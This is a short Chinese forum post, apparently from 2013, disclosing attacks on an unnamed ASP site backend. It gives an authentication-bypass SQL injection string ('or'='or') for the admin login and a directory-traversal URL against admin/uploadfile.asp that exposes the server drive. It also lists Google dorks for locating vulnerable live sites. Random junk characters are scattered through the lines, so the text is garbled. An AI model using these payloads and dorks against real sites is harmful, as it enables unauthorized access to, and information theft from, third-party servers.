后台万能密码 'or'='or'
$ L8 b& U7 P7 L2 i5 v) V: u* m7 c5 @% T; a+ c" Y% M
后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!
, A4 S: Z) N2 W& `6 g; Aadmin/uploadfile.asp?currentFolder=/upfiles/../
" }' t5 G* W8 }' X- n# x' A/ l
* ?5 x* z/ Q1 x+ _漏洞证明:) Y& e2 j$ h, m; h: ~3 p- b
4 C3 \# s0 w( K( d \谷歌:inurl:type.asp?id=1 新闻中心
7 w2 p4 \" ^/ `5 W# }8 p7 t3 b) F或者 :inurl:download_ok.asp?
$ [8 D( a5 U1 {
4 ]* I6 Q. m! V# o9 m6 Y6 [ g |
发表于 2013-3-14 20:17:32
收藏
支持
反对